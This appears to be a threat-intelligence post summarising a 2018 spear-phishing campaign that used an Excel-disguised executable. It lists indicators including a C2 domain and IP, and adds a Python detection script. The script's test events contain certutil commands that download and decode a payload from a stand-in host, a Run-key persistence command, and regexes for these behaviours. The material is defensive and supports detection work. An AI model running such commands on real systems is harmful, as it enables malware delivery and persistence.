Beware of APT targeted attacks disguised as corporate transaction-history Excel document files

2018-08-14 ESTSecurity

http://blog.alyac.co.kr/1833


ESRC observed a spear-phishing campaign in South Korea that delivered malware disguised as a company transaction-history Excel document. The executable used a double-extension filename and an Excel-style icon to hide that it was an .exe file; once run, it displayed a decoy spreadsheet while contacting 071790.000webhostapp.com to retrieve batch commands. The infection chain used certutil to download and decode CAB payloads, installed files including install.bat, spoolsve.exe, and winniet.ini, and configured persistence through a Run registry value. The malware attempted to connect to 111[.]90[.]138[.]41. ESRC noted overlaps with tactics associated with suspected state-sponsored activity but did not assign a firm actor attribution.
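As an added illustration that is not part of the ESRC report, the following Python triages constructed process-creation events for the three behaviours the summary describes (a document-looking double extension, certutil used to download or decode a payload, and Run-key persistence); every path, host and registry value name in it is hypothetical.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample process-creation events as (image path, command line).
# All values are hypothetical, written for this example only.
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Users\user\Downloads\transaction_history.xlsx.exe",
     r'"C:\Users\user\Downloads\transaction_history.xlsx.exe"'),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -urlcache -split -f http://example.invalid/p.txt C:\Users\user\AppData\Local\Temp\p.txt"),
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -decode C:\Users\user\AppData\Local\Temp\p.txt C:\Users\user\AppData\Local\Temp\p.cab"),
    (r"C:\Windows\System32\reg.exe",
     r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d C:\Users\user\AppData\Roaming\updater.exe"),
    (r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     r'"EXCEL.EXE" C:\Users\user\Documents\report.xlsx'),          # benign
    (r"C:\Windows\System32\certutil.exe",
     r"certutil -verify C:\Users\user\Desktop\cert.cer"),            # benign certutil use
]

# A document extension followed (optionally after padding spaces) by an executable one.
DOUBLE_EXT = re.compile(r"\.(xlsx?|xlsm|docx?|pptx?|pdf|hwp)\s*\.(exe|scr|com|pif|bat)$", re.I)
# certutil options that fetch a file from a URL or decode a Base64 blob to disk.
CERTUTIL_ABUSE = re.compile(r"(?i)(^|\s)-(urlcache|decode)(\s|$)")
# reg.exe writing under a CurrentVersion\Run key (HKCU or HKLM).
RUN_KEY = re.compile(r"(?i)reg(\.exe)?\s+add\s+\S*\\CurrentVersion\\Run\b")


def classify(image: str, cmdline: str) -> List[str]:
    """Return the suspicious behaviours this event matches (empty list = nothing flagged)."""
    hits: List[str] = []
    basename = image.rsplit("\\", 1)[-1]
    if DOUBLE_EXT.search(basename):
        hits.append("double-extension executable posing as a document")
    if basename.lower() == "certutil.exe" and CERTUTIL_ABUSE.search(cmdline):
        hits.append("certutil used to download or decode a payload")
    if RUN_KEY.search(cmdline):
        hits.append("Run registry key persistence")
    return hits


def triage(events: List[Tuple[str, str]]) -> Dict[int, List[str]]:
    """Map event index -> matched behaviours, keeping only events that matched something."""
    flagged: Dict[int, List[str]] = {}
    for idx, (image, cmdline) in enumerate(events):
        hits = classify(image, cmdline)
        if hits:
            flagged[idx] = hits
    return flagged


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {'; '.join(reasons)}")
```

Taken together, a single host producing all three matches within a short window reproduces the chain the report describes and is a stronger signal than any one rule alone.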
